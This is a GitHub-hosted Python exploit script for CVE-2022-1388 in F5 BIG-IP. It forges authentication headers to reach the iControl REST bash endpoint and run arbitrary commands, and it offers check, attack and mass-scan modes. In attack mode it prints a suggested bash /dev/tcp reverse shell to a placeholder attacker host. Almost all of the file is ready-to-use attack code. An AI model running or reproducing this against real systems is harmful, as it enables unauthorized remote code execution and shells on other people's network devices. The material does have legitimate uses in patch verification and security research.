-
Notifications
You must be signed in to change notification settings - Fork 2
/
CVE_2022_1388.py
110 lines (94 loc) · 3.98 KB
/
CVE_2022_1388.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
#!/usr/bin/python3.9
# CVE 2022-1388 F5 Exploit
import requests
import sys
import argparse
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
t = int(time.time())
# Colour Functions
def prRed(skk): print("\033[91m {}\033[00m" .format(skk))
def prGreen(skk): print("\033[92m {}\033[00m" .format(skk))
def prYellow(skk): print("\033[93m {}\033[00m" .format(skk))
def headers():
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36",
'Content-Type': 'application/json',
'Connection': 'keep-alive, x-F5-Auth-Token',
'X-F5-Auth-Token': 'a',
'Authorization': 'Basic YWRtaW46'
}
return headers
def check(target_url):
check_url = target_url + '/mgmt/tm/util/bash'
data = {'command': "run", 'utilCmdArgs': "-c id"}
try:
response = requests.post(url=check_url, json=data, headers=headers(), verify=False, timeout=5)
if response.status_code == 200 and 'commandResult' in response.text:
prGreen("[+] Target {} Vulnerable".format(target_url))
else:
prRed("[-] Target {} Not Vulnerable".format(target_url))
except Exception as e:
print('url access exception {0}'.format(target_url))
def attack(target_url, cmd):
attack_url = target_url + '/mgmt/tm/util/bash'
data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
try:
response = requests.post(url=attack_url, json=data, headers=headers(), verify=False, timeout=5)
if response.status_code == 200 and 'commandResult' in response.text:
default = json.loads(response.text)
display = default['commandResult']
prGreen("[+] Target {} Vulnerable".format(target_url))
print("suggested command for a reverse shell!: bash -i >&/dev/tcp/ATTACKERHOST/attackerport 0>&1")
print('[+] Response:{0}'.format(display))
else:
prRed("[-] Target {} Not Vulnerable".format(target_url))
except Exception as e:
prYellow('url exception {0}'.format(target_url))
def scan(file):
for url_link in open(file, 'r', encoding='utf-8'):
if url_link.strip() != '':
url_path = format_url(url_link.strip())
check(url_path)
def format_url(url):
try:
if url[:4] != "http":
url = "https://" + url
url = url.strip()
return url
except Exception as e:
prYellow('URL Incorrect {0}'.format(url))
def main():
parser = argparse.ArgumentParser("F5 Big-IP RCE")
parser.add_argument('-v', '--verify', type=bool, help=' check target is vulnerable ')
parser.add_argument('-u', '--url', type=str, help=' TargetURL ')
parser.add_argument('-a', '--attack', type=bool, help=' attack mode ')
parser.add_argument('-c', '--command', type=str, default="id", help=' command to execute on remote host ')
parser.add_argument('-s', '--scan', type=bool, help=' Batch Identification, supply a file with target hosts ')
parser.add_argument('-f', '--file', type=str, help=' path to file containing target hosts')
args = parser.parse_args()
verify_model = args.verify
url = args.url
attack_model = args.attack
command = args.command
scan_model = args.scan
file = args.file
if verify_model is True and url is not None:
check(url)
elif attack_model is True and url is not None and command is not None:
attack(url, command)
elif scan_model is True and file is not None:
scan(file)
else:
sys.exit(0)
if __name__ == '__main__':
print('''
Y'all still exposing iControl endpoints?
Usage:
Test device: python3 CVE-2022-1388.py -v true -u target_url
Exploit device: python3 CVE_2022_1388.py -a true -u target_url -c command
Exploit List: python3 CVE_2022_1388.py -s true -f file
''')
main()